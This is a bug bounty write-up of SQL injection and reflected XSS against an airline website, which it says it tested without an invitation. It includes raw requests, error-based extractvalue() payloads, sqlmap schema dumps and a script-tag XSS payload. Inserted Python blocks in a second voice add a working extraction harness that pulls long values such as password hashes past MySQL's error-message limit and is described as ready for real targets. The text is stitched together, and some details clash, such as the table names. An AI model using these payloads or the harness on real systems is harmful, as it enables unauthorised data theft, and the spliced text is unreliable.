SQLi & XSS Vulnerabilities in a Popular Airlines Website | BugBounty POC

Hey guys, some of my friends were asking for another write-up, so here's one :) Last month I decided to practice a little, so I took one of the popular websites. Let's call that website goodwebsite.com (as it's not a public program). Let's start with a little basics.

What is an SQL injection vulnerability?

This vulnerability lets an attacker send crafted input that the application pastes into a SQL query, so the input is interpreted as part of the query itself. In this case it allows an unauthenticated user to grab data from the victim's website database, including sensitive user information.

Why did this issue exist?

This issue existed because goodwebsite allowed improperly sanitized user input in a login page, which is basically the same as placing user input inside a raw SQL query. Using this attack vector, an attacker could leak hashed passwords and some other data.

So I was testing the website. While testing around the login page, I entered a random username and password, intercepted the request with Burp Suite and changed the username to Test%27 (a URL-encoded single quote). Then I sent the request to Burp Repeater and got a reply with an error. The request and the error in the response looked like this.

Request:
POST /register-login/check.php HTTP/1.1
Content-Length: 76
Content-Type: application/x-www-form-urlencoded
Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724
Host: goodwebsite.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
strLogin=Test%27&strPassword=k
Response error:
PDOException Object (
  [message:protected] => SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test' ' and `valid_id` = 1' at line 1
  [string:Exception:private] =>
  [code:protected] => 42000
  [file:protected] => /var/www/goodwebsite.server.com/register-login/send.php
  [line:protected] => 10
  [trace:Exception:private] => Array (
    [0] => Array (
      [file] => /var/www/goodwebsite.server.com/register-login/send.php
      [line] => 10
      [function] => query
      [class] => PDO
      [type] => ->
      [args] => Array ( [0] => SELECT * FROM `wp_ggg_user` WHERE `login` = Test'e ' and `valid_id` = 1; )
    )
  )
  [previous:Exception:private] =>
  [errorInfo] => Array (
    [0] => 42000
    [1] => 1064
    [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test' ' and `valid_id` = 1' at line 1
  )
)
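The query visible in that trace, SELECT * FROM ... WHERE `login` = '<input>' and `valid_id` = 1, is exactly the pattern described above: the login value is pasted into the SQL string, so a single quote in it changes the syntax of the statement. The following is an added Python example (not the site's PHP code) that reproduces the same pattern against an in-memory SQLite stand-in, with assumed table and column names, beside the parameterised form that fixes it:

```python
import sqlite3

# Constructed in-memory stand-in for the site's user table. Only the `login`
# and `valid_id` columns are visible in the write-up; the rest are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_bms_user (login TEXT, password_hash TEXT, valid_id INTEGER)"
    )
    conn.executemany(
        "INSERT INTO wp_bms_user VALUES (?, ?, ?)",
        [("alice", "$2y$10$fakehash", 1), ("bob", "$2y$10$fakehash2", 0)],
    )
    return conn

def find_user_vulnerable(conn, login):
    # Mirrors the query in the PDOException trace: the login value is
    # concatenated into the SQL text, so a quote inside it becomes SQL syntax.
    sql = f"SELECT * FROM wp_bms_user WHERE login = '{login}' AND valid_id = 1"
    return conn.execute(sql).fetchall()

def find_user_safe(conn, login):
    # Parameterised statement: the driver passes the value separately from the
    # query text, so a quote in the login stays data and never reaches the parser.
    sql = "SELECT * FROM wp_bms_user WHERE login = ? AND valid_id = 1"
    return conn.execute(sql, (login,)).fetchall()

def probe(conn, login):
    """Run the vulnerable lookup and report ('ok', rows) or ('error', message).
    A bare quote yields the same class of failure the write-up shows: the
    string literal is never closed and the database rejects the statement."""
    try:
        return ("ok", find_user_vulnerable(conn, login))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    print(probe(db, "alice"))          # normal login lookup succeeds
    print(probe(db, "Test'"))          # the Test%27 probe: syntax error leaks back
    print(find_user_safe(db, "Test'")) # parameterised: no error, just no match
```

The error message returned by the vulnerable path is what an attacker reads; with the parameterised form the quote is simply a character in the login value and the application sees an ordinary "no such user" result.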

So after that error came up I was like WTF :O. Let's try something else. The first query I used was Test%27and extractvalue(1,concat(0x00a,database()))or' and yes, the error that appeared this time was similar to the one above, with just a minor change at the end of the error, which looked like this:

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: '
goodwebsite'
)

So it actually gave me the database name, which was goodwebsite :)

(Screenshot: Database Name)

I actually got expert advice on this from @iamnoooob (he actually is 1337 while calling himself N00B :D). Thanks bro :p

I basically tested some basic queries like:

system_user()
@@version
database()
@@hostname
@@datadir
@@GLOBAL.VERSION
session_user()
schema()
UUID()

So the next query was Test%27and extractvalue(1,concat(0x00a,system_user()))or' and the error gave me

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: '
goodwebsite@localhost'
)
(Screenshot: System_User)

So at this point the SQL injection was confirmed, but I decided to dig a little further to get some more information. The 3rd query used was
Test%27and extractvalue(1,concat(0x00a,@@hostname))or'
and this time the error had

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: '
www2.rz.something.com'
)
(Screenshot: Hostname)

Next, I had totally forgotten to check the version, so:
Test%27and extractvalue(1,concat(0x00a,@@version))or'
and the output was

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: '
5.1.73-1+deb6u1-log'
)
(Screenshot: Database Version)

Well, then I tried Test%27and extractvalue(1,concat(0x00a,UUID()))or' and the error was

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: '
ab88…..UUDI'
)
(Screenshot: UUID)
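Every query above has the same shape: close the login string, call extractvalue() with an XPath that starts with a byte MySQL cannot parse (the 0x0a newline), and reopen a string so the trailing ' and `valid_id` = 1 still parses; MySQL then echoes the evaluated expression inside the "XPATH syntax error" message. The following added Python example (not from the write-up, and not the author's tooling) turns that manual process into a small harness: it builds the POST body, parses the leaked value out of the PDOException dump, and handles the caveat the write-up never hits, namely that MySQL caps the echoed text at 32 bytes (one of which is the separator), so longer values have to be pulled in substr() windows. The fake_server, FAKE_DB and the group_concat expression are constructed stand-ins so the code runs offline; the short values are the ones shown in the screenshots above.

```python
import re
from urllib.parse import urlencode, parse_qs

# Shape of the write-up's payload, with 0x0a as the un-parseable XPath prefix.
PAYLOAD_TEMPLATE = "Test'and extractvalue(1,concat(0x0a,{expr}))or'"

# MySQL truncates the text echoed in an XPATH syntax error to 32 bytes, and the
# 0x0a separator uses one of them, so values are fetched in 31-byte windows.
WINDOW = 31

def build_payload(expr):
    return PAYLOAD_TEMPLATE.format(expr=expr)

def build_body(expr, password="k"):
    """Form-encoded body for the strLogin/strPassword POST seen in the write-up."""
    return urlencode({"strLogin": build_payload(expr), "strPassword": password})

XPATH_ERROR = re.compile(r"XPATH syntax error: '\n?(.*?)'", re.S)

def parse_leak(response_text):
    """Return the value leaked through a MySQL 1105 XPATH error, or None when
    the response carries no such error (e.g. only the plain 1064 syntax error)."""
    m = XPATH_ERROR.search(response_text)
    return m.group(1) if m else None

def windows(expr, length):
    """substr() expressions covering `length` bytes of `expr`, WINDOW at a time."""
    return [f"substr({expr},{start},{WINDOW})" for start in range(1, length + 1, WINDOW)]

def leak(expr, send, length=None):
    """Leak `expr` via `send(body) -> response text`. Pass `length` (an upper
    bound on the value's size) to window the read around the 32-byte cap."""
    if length is None:
        return parse_leak(send(build_body(expr)))
    return "".join(parse_leak(send(build_body(w))) or "" for w in windows(expr, length))

# ---- constructed stand-in for the target so the harness runs offline --------
FAKE_DB = {
    "database()": "goodwebsite",
    "system_user()": "goodwebsite@localhost",
    "@@hostname": "www2.rz.something.com",
    "@@version": "5.1.73-1+deb6u1-log",
    # Assumed expression, answered with names from the sqlmap table list, purely
    # to exercise windowing on a value longer than 32 bytes.
    "(select group_concat(table_name) from information_schema.tables where table_schema=database())":
        "wp_bms_log,wp_bms_quiz_lh_answer,wp_bms_quiz_lh_question,wp_bms_quiz_lh_quiz",
}
INJECTED = re.compile(r"concat\(0x0a,(.*)\)\)or'$")
SUBSTR = re.compile(r"substr\((.*),(\d+),(\d+)\)")

def fake_server(body):
    """Mimic the login handler: evaluate the injected expression against FAKE_DB
    and answer with a PDOException-style errorInfo carrying the XPATH error."""
    login = parse_qs(body)["strLogin"][0]
    m = INJECTED.search(login)
    if not m:
        return "SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax"
    expr = m.group(1)
    sm = SUBSTR.fullmatch(expr)
    if sm:
        start, count = int(sm.group(2)) - 1, int(sm.group(3))
        value = FAKE_DB[sm.group(1)][start:start + count]
    else:
        value = FAKE_DB[expr]
    echoed = ("\n" + value)[:32]  # MySQL's 32-byte cap, separator included
    return f"[errorInfo] => Array ( [0] => HY000 [1] => 1105 [2] => XPATH syntax error: '{echoed}' )"

if __name__ == "__main__":
    for e in ("database()", "system_user()", "@@hostname", "@@version"):
        print(e, "->", leak(e, fake_server))
    long_expr = next(k for k in FAKE_DB if k.startswith("(select"))
    print(leak(long_expr, fake_server, length=90))
```

Against a real target, `send` would be a function that POSTs the body to check.php and returns the response text; everything else stays the same. The windowing matters as soon as you move from database() to anything like a table list or a password hash, because a single extractvalue() read silently drops everything past the cap.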

So by now I had enough information to demonstrate the impact, but sometimes I like to dig more, so to save some time I opened a terminal and ran sqlmap. Here's what I got:

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
Database: goodwebsite
[18 tables]
+-------------------------+
| wp_bms_log              |
| wp_bms_quiz_lh_answer   |
| wp_bms_quiz_lh_question |
| wp_bms_quiz_lh_quiz     |
| wp_bms_statistics       |
| wp_bms_user             |
| wp_commentmeta          |
| wp_comments             |
| wp_links                |
| wp_options              |
| wp_postmeta             |
| wp_posts                |
| wp_term_relationships   |
| wp_term_taxonomy        |
| wp_termmeta             |
| wp_terms                |
| wp_usermeta             |
| wp_users                |
+-------------------------+
Then:
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(255)        |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(255)        |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+
(Screenshot: Exploitation through sqlmap)

And yes, that's where I stopped exploitation :P lol

XSS:

The next thing was to test something else. I saw another endpoint there,
goodwebsite.com/register-login/send.php, which accepts a POST request with the parameter
strSendMail=
So I tried the same SQL test and got the same error, but then I tried an XSS payload:
e'%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>
And the request was like:

POST /register-login/send.php HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Referer: http://goodwebsite.com/
Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724
Host: goodwebsite.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
strSendMail=e'%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>

And BOOM!

(Screenshot: XSS)
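That probe string is a standard reflection test rather than a one-off: each of ' " ( ) & % < > lands in a different encoding bucket, and the alphanumeric canary acx survives any encoder, so the reflection point can be located in the response even when the special characters are mangled. The following added Python example (not the site's code and not the author's tooling) shows, on a constructed error page that echoes strSendMail, how to classify which of those characters came back raw and which came back entity-encoded, and what applying html.escape at the output point does to the same page. It goes a little beyond the write-up in that it also handles partially encoded output, where for instance only < and > were neutralised:

```python
import html
import re
from urllib.parse import unquote

# The write-up's probe, URL-decoded as send.php would see it:
#   e'"()&%<acx><ScRiPt >prompt(/khizer/)</ScRiPt>
PROBE = unquote("e'%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>")

# Characters whose raw reflection opens an HTML, attribute or script context.
SENSITIVE = set("'\"<>&")

# An HTML entity read forwards, and the same thing read backwards (used when
# scanning from the canary back towards the start of the reflection).
ENTITY_FWD = re.compile(r"&(?:#x?[0-9a-fA-F]+|[a-zA-Z]+);")
ENTITY_REV = re.compile(r";(?:[0-9a-fA-F]+x?#|[a-zA-Z]+)&")

def render_vulnerable(value):
    # Constructed stand-in for the error page: strSendMail echoed verbatim.
    return f"<p>Could not send mail to {value}</p>"

def render_safe(value):
    # Same page with entity encoding applied at the output point.
    return f"<p>Could not send mail to {html.escape(value, quote=True)}</p>"

def _scan(page, probe, entity):
    """Walk page and probe in lock-step from index 0. Sensitive probe characters
    are recorded as raw (came back verbatim) or encoded (an entity stands in
    their place); the walk stops at the first character that is neither."""
    raw, enc = set(), set()
    i = j = 0
    while i < len(page) and j < len(probe):
        c = probe[j]
        m = entity.match(page, i)
        if m and c in SENSITIVE:
            enc.add(c)
            i = m.end()
        elif page[i] == c:
            if c in SENSITIVE:
                raw.add(c)
            i += 1
        else:
            break
        j += 1
    return raw, enc

def reflected_unescaped(probe, page, canary="acx"):
    """Locate the reflection by its alphanumeric canary (which no encoder
    touches), then classify the sensitive characters on both sides of it.
    Returns None when the probe is not reflected at all."""
    p, q = page.find(canary), probe.find(canary)
    if p < 0:
        return None
    raw_f, enc_f = _scan(page[p:], probe[q:], ENTITY_FWD)
    raw_b, enc_b = _scan(page[:p][::-1], probe[:q][::-1], ENTITY_REV)
    return {"raw": raw_f | raw_b, "encoded": enc_f | enc_b}

if __name__ == "__main__":
    print("vulnerable:", reflected_unescaped(PROBE, render_vulnerable(PROBE)))
    print("escaped:   ", reflected_unescaped(PROBE, render_safe(PROBE)))
```

When the "raw" set contains < and >, the <ScRiPt> tag in the probe is live markup and the prompt() fires, which is the BOOM above; when everything sits in "encoded", the same page is inert. A partially encoded result (say, only < and > encoded but quotes raw) tells you the reflection may still be exploitable from inside an attribute, which is why the probe carries both quote styles.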

So I reported both bugs with details, and they actually got patched within an hour of my report. This is what I got in reply:

(Screenshot: Reply)

Well, I asked if they could invite me to a private HackerOne program, but they can't yet ;') It was good practice and fun :D

That's all folks :p Good-bye for now. I hope to publish some more POCs soon ;) and don't forget to send feedback! 😾
